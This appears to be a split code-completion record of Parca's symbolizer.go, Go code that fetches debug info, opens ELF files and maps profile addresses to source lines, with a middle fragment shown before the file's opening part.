Help: "How long it took in seconds to finish a round of the symbolication cycle in batches.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
storeDuration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_store_duration_seconds",
Help: "How long it took in seconds to store a batch of the symbolized locations.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
const (
defaultDemangleMode = "simple"
defaultAttemptThreshold = 3
)
s := &Symbolizer{
logger: log.With(logger, "component", "symbolizer"),
attempts: attemptsTotal,
errors: errorsTotal,
duration: duration,
storeDuration: storeDuration,
metastore: metastore,
debuginfo: debuginfo,
tmpDir: tmpDir,
batchSize: batchSize,
metadata: metadata,
demangler: demangle.NewDemangler(defaultDemangleMode, false),
attemptThreshold: defaultAttemptThreshold,
linerCreationFailed: map[string]struct{}{},
symbolizationAttempts: map[string]map[uint64]int{},
symbolizationFailed: map[string]map[uint64]struct{}{},
pcRanges: map[string][2]uint64{},
}
for _, opt := range opts {
opt(s)
}
return s
}
func (s *Symbolizer) Run(ctx context.Context, interval time.Duration) error {
return runutil.Repeat(interval, ctx.Done(), func() error {
level.Debug(s.logger).Log("msg", "start symbolization cycle")
s.runSymbolizationCycle(ctx)
level.Debug(s.logger).Log("msg", "symbolization loop completed")
return nil
})
}
func (s *Symbolizer) runSymbolizationCycle(ctx context.Context) {
var begin time.Time
prevMaxKey := ""
for {
begin = time.Now()
s.attempts.Inc()
lres, err := s.metastore.UnsymbolizedLocations(ctx, &pb.UnsymbolizedLocationsRequest{
Limit: s.batchSize,
MinKey: prevMaxKey,
})
if err != nil {
level.Error(s.logger).Log("msg", "failed to fetch unsymbolized locations", "err", err)
s.errors.WithLabelValues("fetch_unsymbolized_locations").Inc()
s.duration.Observe(time.Since(begin).Seconds())
// Try again on the next cycle.
return
}
if len(lres.Locations) == 0 {
s.duration.Observe(time.Since(begin).Seconds())
// Nothing to symbolize.
return
}
prevMaxKey = lres.MaxKey
err = s.Symbolize(ctx, lres.Locations)
if err != nil {
level.Debug(s.logger).Log("msg", "errors occurred during symbolization", "err", err)
}
s.duration.Observe(time.Since(begin).Seconds())
if s.batchSize == 0 {
// If batch size is 0 we won't continue with the next batch as we
// should have already processed everything.
return
}
}
}
// UnsymbolizableMapping returns true if a mapping points to a binary for which
// locations can't be symbolized in principle, at least now. Examples are
// "[vdso]", [vsyscall]" and some others, see the code.
func UnsymbolizableMapping(m *pb.Mapping) bool {
name := filepath.Base(m.File)
return strings.HasPrefix(name, "[") || strings.HasPrefix(name, "linux-vdso") || strings.HasPrefix(m.File, "/dev/dri/")
}
type MappingLocations struct {
Mapping *pb.Mapping
Locations []*pb.Location
// LocationsLines is a list of lines per location.
LocationsLines [][]profile.LocationLine
}
func (s *Symbolizer) Symbolize(ctx context.Context, locations []*pb.Location) error {
mappingsIndex := map[string]int{}
mappingIDs := []string{}
for _, loc := range locations {
if _, ok := mappingsIndex[loc.MappingId]; !ok {
mappingIDs = append(mappingIDs, loc.MappingId)
mappingsIndex[loc.MappingId] = len(mappingIDs) - 1
}
}
mres, err := s.metastore.Mappings(ctx, &pb.MappingsRequest{MappingIds: mappingIDs})
if err != nil {
s.errors.WithLabelValues("get_mappings").Inc()
return fmt.Errorf("get mappings: %w", err)
}
// Aggregate locations per mapping to get prepared for batch request.
locationsByMappings := make([]*MappingLocations, len(mres.Mappings))
for i, m := range mres.Mappings {
locationsByMappings[i] = &MappingLocations{Mapping: m}
}
for _, loc := range locations {
locationsByMapping := locationsByMappings[mappingsIndex[loc.MappingId]]
// Already symbolized!
if loc.Lines != nil && len(loc.Lines) > 0 {
level.Debug(s.logger).Log("msg", "location already symbolized, skipping")
continue
}
locationsByMapping.Locations = append(locationsByMapping.Locations, loc)
}
newLinerCache := map[string]liner{}
for _, locationsByMapping := range locationsByMappings {
mapping := locationsByMapping.Mapping
// If Mapping or Mapping.BuildID is empty, we cannot associate an object file with functions.
if mapping == nil || len(mapping.BuildId) == 0 || UnsymbolizableMapping(mapping) {
level.Debug(s.logger).Log("msg", "mapping of location is empty, skipping")
continue
}
logger := log.With(s.logger, "buildid", mapping.BuildId)
var liner liner
locations := locationsByMapping.Locations
// Symbolize returns a list of lines per location passed to it.
locationsByMapping.LocationsLines, liner, err = s.symbolizeLocationsForMapping(ctx, mapping, locations)
if err != nil {
level.Debug(logger).Log("msg", "storage symbolization request failed", "err", err)
continue
}
if liner != nil {
newLinerCache[mapping.BuildId] = liner
}
}
for k := range newLinerCache {
delete(s.linerCache, k)
}
for _, liner := range s.linerCache {
// These are liners that didn't show up in the latest iteration.
if err := liner.Close(); err != nil {
level.Debug(s.logger).Log("msg", "failed to close liner", "err", err)
}
if err := os.Remove(liner.File()); err != nil {
level.Debug(s.logger).Log("msg", "failed to remove liner file", "err", err)
}
}
s.linerCache = newLinerCache
numFunctions := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
numFunctions += len(locationLines)
}
}
if numFunctions == 0 {
return nil
}
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes it the
// given location.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempt to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found {
locationsToSymbolize++
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsToSymbolize++
}
}
return locationsToSymbolize
}
// newLiner creates a new liner for the given mapping and object file path.
func (s *Symbolizer) newLiner(filepath string, f *elf.File, quality *debuginfopb.DebuginfoQuality) (liner, error) {
switch {
case quality.HasDwarf:
lnr, err := addr2line.DWARF(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create DWARF liner: %w", err)
}
return lnr, nil
case quality.HasGoPclntab:
lnr, err := addr2line.Go(s.logger, filepath, f)
if err != nil {
return nil, fmt.Errorf("failed to create Go liner: %w", err)
}
return lnr, nil
// TODO CHECK plt
case quality.HasSymtab || quality.HasDynsym:
lnr, err := addr2line.Symbols(s.logger, filepath, f, s.demangler)
if err != nil { | return nil, fmt.Errorf("failed to create Symtab liner: %w", err)
}
return lnr, nil
default:
return nil, ErrLinerFailed
}
}
// pcToLines returns the line number of the given PC while keeping the track of symbolization attempts and failures.
func (s *Symbolizer) pcToLines(liner liner, key string, addr uint64) []profile.LocationLine {
lines, err := liner.PCToLines(addr)
level.Debug(s.logger).Log("msg", "symbolized location", "build_id", key, "address", addr, "lines_count", len(lines), "err", err, "liner_type", fmt.Sprintf("%T", liner))
if err != nil {
// Error bookkeeping.
if prev, ok := s.symbolizationAttempts[key][addr]; ok {
prev++
if prev >= s.attemptThreshold {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
} else {
s.symbolizationAttempts[key][addr] = prev
}
return nil
}
// First failed attempt.
s.symbolizationAttempts[key] = map[uint64]int{addr: 1}
return nil
}
if len(lines) == 0 {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
}
return lines
} | random_line_split |
|
symbolizer.go | // Copyright 2022-2023 The Parca Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package symbolizer
import (
"context"
"debug/elf"
"errors"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"time"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
debuginfopb "github.com/parca-dev/parca/gen/proto/go/parca/debuginfo/v1alpha1"
pb "github.com/parca-dev/parca/gen/proto/go/parca/metastore/v1alpha1"
"github.com/parca-dev/parca/pkg/debuginfo"
"github.com/parca-dev/parca/pkg/profile"
"github.com/parca-dev/parca/pkg/runutil"
"github.com/parca-dev/parca/pkg/symbol/addr2line"
"github.com/parca-dev/parca/pkg/symbol/demangle"
"github.com/parca-dev/parca/pkg/symbol/elfutils"
)
var (
ErrNotValidElf = errors.New("not a valid ELF file")
ErrNoDebuginfo = errors.New("no debug info found")
ErrLinerFailed = errors.New("liner creation failed")
)
type DebuginfoMetadata interface {
SetQuality(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType, quality *debuginfopb.DebuginfoQuality) error
Fetch(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType) (*debuginfopb.Debuginfo, error)
}
// liner is the interface implemented by symbolizers
// which read an object file (symbol table or debug information) and return
// source code lines by a given memory address.
type liner interface {
PCToLines(pc uint64) ([]profile.LocationLine, error)
PCRange() ([2]uint64, error)
Close() error
File() string
}
type Option func(*Symbolizer)
func WithAttemptThreshold(t int) Option {
return func(s *Symbolizer) {
s.attemptThreshold = t
}
}
func WithDemangleMode(mode string) Option {
return func(s *Symbolizer) {
s.demangler = demangle.NewDemangler(mode, false)
}
}
type Symbolizer struct {
logger log.Logger
// attempts counts the total number of symbolication attempts.
// It counts per batch.
attempts prometheus.Counter
// errors counts the total number of symbolication errors, partitioned by an error reason
// such as failure to fetch unsymbolized locations.
// It counts per batch.
errors *prometheus.CounterVec
// duration is a histogram to measure how long it takes to finish a symbolication round.
// Note, a single observation is per batch.
duration prometheus.Histogram
// storeDuration is a histogram to measure how long it takes to store the symbolized locations.
// Note, a single observation is per batch.
storeDuration prometheus.Histogram
metastore pb.MetastoreServiceClient
debuginfo DebuginfoFetcher
metadata DebuginfoMetadata
demangler *demangle.Demangler
attemptThreshold int
linerCreationFailed map[string]struct{}
symbolizationAttempts map[string]map[uint64]int
symbolizationFailed map[string]map[uint64]struct{}
pcRanges map[string][2]uint64
linerCache map[string]liner
batchSize uint32
tmpDir string
}
type DebuginfoFetcher interface {
// Fetch ensures that the debug info for the given build ID is available on
// a local filesystem and returns a path to it.
FetchDebuginfo(ctx context.Context, dbginfo *debuginfopb.Debuginfo) (io.ReadCloser, error)
}
func New(
logger log.Logger,
reg prometheus.Registerer,
metadata DebuginfoMetadata,
metastore pb.MetastoreServiceClient,
debuginfo DebuginfoFetcher,
tmpDir string,
batchSize uint32,
opts ...Option,
) *Symbolizer {
attemptsTotal := promauto.With(reg).NewCounter(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_attempts_total",
Help: "Total number of symbolication attempts in batches.",
},
)
errorsTotal := promauto.With(reg).NewCounterVec(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_errors_total",
Help: "Total number of symbolication errors in batches, partitioned by an error reason.",
},
[]string{"reason"},
)
duration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_symbolication_duration_seconds",
Help: "How long it took in seconds to finish a round of the symbolication cycle in batches.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
storeDuration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_store_duration_seconds",
Help: "How long it took in seconds to store a batch of the symbolized locations.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
const (
defaultDemangleMode = "simple"
defaultAttemptThreshold = 3
)
s := &Symbolizer{
logger: log.With(logger, "component", "symbolizer"),
attempts: attemptsTotal,
errors: errorsTotal,
duration: duration,
storeDuration: storeDuration,
metastore: metastore,
debuginfo: debuginfo,
tmpDir: tmpDir,
batchSize: batchSize,
metadata: metadata,
demangler: demangle.NewDemangler(defaultDemangleMode, false),
attemptThreshold: defaultAttemptThreshold,
linerCreationFailed: map[string]struct{}{},
symbolizationAttempts: map[string]map[uint64]int{},
symbolizationFailed: map[string]map[uint64]struct{}{},
pcRanges: map[string][2]uint64{},
}
for _, opt := range opts {
opt(s)
}
return s
}
func (s *Symbolizer) Run(ctx context.Context, interval time.Duration) error {
return runutil.Repeat(interval, ctx.Done(), func() error {
level.Debug(s.logger).Log("msg", "start symbolization cycle")
s.runSymbolizationCycle(ctx)
level.Debug(s.logger).Log("msg", "symbolization loop completed")
return nil
})
}
func (s *Symbolizer) runSymbolizationCycle(ctx context.Context) {
var begin time.Time
prevMaxKey := ""
for {
begin = time.Now()
s.attempts.Inc()
lres, err := s.metastore.UnsymbolizedLocations(ctx, &pb.UnsymbolizedLocationsRequest{
Limit: s.batchSize,
MinKey: prevMaxKey,
})
if err != nil {
level.Error(s.logger).Log("msg", "failed to fetch unsymbolized locations", "err", err)
s.errors.WithLabelValues("fetch_unsymbolized_locations").Inc()
s.duration.Observe(time.Since(begin).Seconds())
// Try again on the next cycle.
return
}
if len(lres.Locations) == 0 {
s.duration.Observe(time.Since(begin).Seconds())
// Nothing to symbolize.
return
}
prevMaxKey = lres.MaxKey
err = s.Symbolize(ctx, lres.Locations)
if err != nil {
level.Debug(s.logger).Log("msg", "errors occurred during symbolization", "err", err)
}
s.duration.Observe(time.Since(begin).Seconds())
if s.batchSize == 0 {
// If batch size is 0 we won't continue with the next batch as we
// should have already processed everything.
return
}
}
}
// UnsymbolizableMapping returns true if a mapping points to a binary for which
// locations can't be symbolized in principle, at least now. Examples are
// "[vdso]", [vsyscall]" and some others, see the code.
func UnsymbolizableMapping(m *pb.Mapping) bool {
name := filepath.Base(m.File)
return strings.HasPrefix(name, "[") || strings.HasPrefix(name, "linux-vdso") || strings.HasPrefix(m.File, "/dev/dri/")
}
type MappingLocations struct {
Mapping *pb.Mapping
Locations []*pb.Location
// LocationsLines is a list of lines per location.
LocationsLines [][]profile.LocationLine
}
func (s *Symbolizer) Symbolize(ctx context.Context, locations []*pb.Location) error {
mappingsIndex := map[string]int{}
mappingIDs := []string{}
for _, loc := range locations {
if _, ok := mappingsIndex[loc.MappingId]; !ok {
mappingIDs = append(mappingIDs, loc.MappingId)
mappingsIndex[loc.MappingId] = len(mappingIDs) - 1
}
}
mres, err := s.metastore.Mappings(ctx, &pb.MappingsRequest{MappingIds: mappingIDs})
if err != nil {
s.errors.WithLabelValues("get_mappings").Inc()
return fmt.Errorf("get mappings: %w", err)
}
// Aggregate locations per mapping to get prepared for batch request.
locationsByMappings := make([]*MappingLocations, len(mres.Mappings))
for i, m := range mres.Mappings {
locationsByMappings[i] = &MappingLocations{Mapping: m}
}
for _, loc := range locations {
locationsByMapping := locationsByMappings[mappingsIndex[loc.MappingId]]
// Already symbolized!
if loc.Lines != nil && len(loc.Lines) > 0 {
level.Debug(s.logger).Log("msg", "location already symbolized, skipping")
continue
}
locationsByMapping.Locations = append(locationsByMapping.Locations, loc)
}
newLinerCache := map[string]liner{}
for _, locationsByMapping := range locationsByMappings {
mapping := locationsByMapping.Mapping
// If Mapping or Mapping.BuildID is empty, we cannot associate an object file with functions.
if mapping == nil || len(mapping.BuildId) == 0 || UnsymbolizableMapping(mapping) {
level.Debug(s.logger).Log("msg", "mapping of location is empty, skipping")
continue
}
logger := log.With(s.logger, "buildid", mapping.BuildId)
var liner liner
locations := locationsByMapping.Locations
// Symbolize returns a list of lines per location passed to it.
locationsByMapping.LocationsLines, liner, err = s.symbolizeLocationsForMapping(ctx, mapping, locations)
if err != nil {
level.Debug(logger).Log("msg", "storage symbolization request failed", "err", err)
continue
}
if liner != nil {
newLinerCache[mapping.BuildId] = liner
}
}
for k := range newLinerCache {
delete(s.linerCache, k)
}
for _, liner := range s.linerCache {
// These are liners that didn't show up in the latest iteration.
if err := liner.Close(); err != nil {
level.Debug(s.logger).Log("msg", "failed to close liner", "err", err)
}
if err := os.Remove(liner.File()); err != nil {
level.Debug(s.logger).Log("msg", "failed to remove liner file", "err", err)
}
}
s.linerCache = newLinerCache
numFunctions := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
numFunctions += len(locationLines)
}
}
if numFunctions == 0 {
return nil
}
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes it the
// given location.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempt to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found |
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsToSymbolize++
}
}
return locationsToSymbolize
}
// newLiner creates a new liner for the given mapping and object file path.
func (s *Symbolizer) newLiner(filepath string, f *elf.File, quality *debuginfopb.DebuginfoQuality) (liner, error) {
switch {
case quality.HasDwarf:
lnr, err := addr2line.DWARF(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create DWARF liner: %w", err)
}
return lnr, nil
